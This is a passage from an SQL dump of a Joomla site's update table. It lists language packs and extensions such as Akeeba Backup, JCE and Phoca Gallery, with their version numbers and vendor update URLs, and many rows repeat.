India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(33434,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(33435,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(33436,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(33437,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(33438,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(33439,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(33440,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(33441,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(33442,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(33443,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(33444,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(33445,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(33446,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(33447,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(33448,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(33449,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(33450,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(33451,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(33452,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(33453,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(33454,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(33455,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(33456,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(33457,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(33458,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(33459,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(33460,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(33461,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(33462,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(33463,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(33464,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(33465,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(33466,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(33467,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(33468,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(33469,57,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(33470,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(33471,57,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(33472,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(33473,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(33474,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(33475,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(33476,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(33477,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(33478,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(33479,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(33480,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(33481,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(33482,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(33483,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(33484,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(33485,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(33486,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(33487,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(33488,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(33489,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(33490,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(33491,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(33492,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(33493,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(33494,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(33495,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(33496,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(33497,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(33498,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(33499,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(33500,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(33501,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(33502,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(33503,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(33504,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33505,122,0,'Google Structured Data Free','','gsd','plugin','system',0,'5.1.3','','https://static.tassos.gr/update/gsdfree?type=.xml','https://www.tassos.gr/releases/google-structured-data/google-structured-data-markup-5-1-3?format=html',''),(33506,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(33507,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(33508,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(33509,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(33510,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(33511,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(33512,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(33513,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(33514,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(33515,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(33516,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(33517,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(33518,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(33519,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(33520,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(33521,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(33522,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(33523,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(33524,57,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(33525,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(33526,57,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(33527,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(33528,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(33529,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(33530,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(33531,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(33532,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(33533,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(33534,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(33535,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(33536,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(33537,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(33538,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(33539,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(33540,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(33541,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(33542,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(33543,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(33544,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(33545,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(33546,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(33547,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(33548,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(33549,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(33550,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(33551,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(33552,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(33553,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(33554,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(33555,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(33556,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(33557,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(33558,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(33559,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33560,129,0,'JCE 2.9.29','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.29','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-29-released',''),(33561,122,0,'Google Structured Data Free','','gsd','plugin','system',0,'5.1.3','','https://static.tassos.gr/update/gsdfree?type=.xml','https://www.tassos.gr/releases/google-structured-data/google-structured-data-markup-5-1-3?format=html',''),(33562,129,0,'JCE 2.9.29','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.29','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-29-released',''),(33563,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(33564,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(33565,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(33566,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33567,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33568,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33569,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33570,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33571,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33572,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33573,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33574,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33575,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33576,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33577,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33578,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33579,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33580,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33581,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33582,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33583,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33584,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33585,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33586,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33587,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33588,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33589,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33590,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33591,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33592,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33593,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33594,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33595,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33596,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33597,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33598,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33599,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33600,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33601,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33602,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33603,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33604,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33605,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33606,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33607,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33608,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33609,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33610,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33611,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33612,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33613,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33614,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33615,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33616,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33617,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33618,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33619,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33620,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33621,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33622,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33623,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33624,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33625,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33626,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33627,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33628,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33629,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33630,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33631,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33632,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33633,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33634,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33635,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33636,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33637,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33638,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33639,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33640,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33641,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33642,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33643,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33644,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33645,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33646,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33647,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33648,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33649,67,0,'Akeeba Backup Core 